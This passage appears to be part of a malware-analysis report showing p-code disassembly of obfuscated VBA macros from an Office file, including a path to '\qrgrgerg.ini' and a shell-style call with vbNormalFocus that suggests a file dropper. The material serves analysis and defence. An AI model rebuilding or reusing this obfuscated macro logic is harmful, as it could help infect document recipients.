' 	ArgsCall Range 0x0000 
' Line #99:
' Line #100:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #101:
' Line #102:
' 	LineCont 0x0004 05 00 04 00
' 	LitDI2 0x0000 
' 	Ld id_0258 
' 	Ld vbNormalFocus 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall PRQBAYQD 0x0005 
' Line #103:
' Line #104:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #105:
' Line #106:
' 	ArgsCall Range 0x0000 
' Line #107:
' Line #108:
' 	Ld vbNormalFocus 
' 	ArgsLd Dir 0x0001 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #109:
' 	ArgsCall Range 0x0000 
' Line #110:
' 	Ld vbNormalFocus 
' 	Ld id_025C 
' 	ArgsCall id_025A 0x0002 
' Line #111:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #112:
' 	EndIfBlock 
' Line #113:
' Line #114:
' 	EndSub 
' Line #115:
' Macros/VBA/NewMacros - 1023 bytes
' Line #0:
' 	FuncDefn (Sub CXIHOWIQ())
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	QuoteRem 0x0000 0x000B " kudi Macro"
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	QuoteRem 0x0000 0x0000 ""
' Line #5:
' Line #6:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.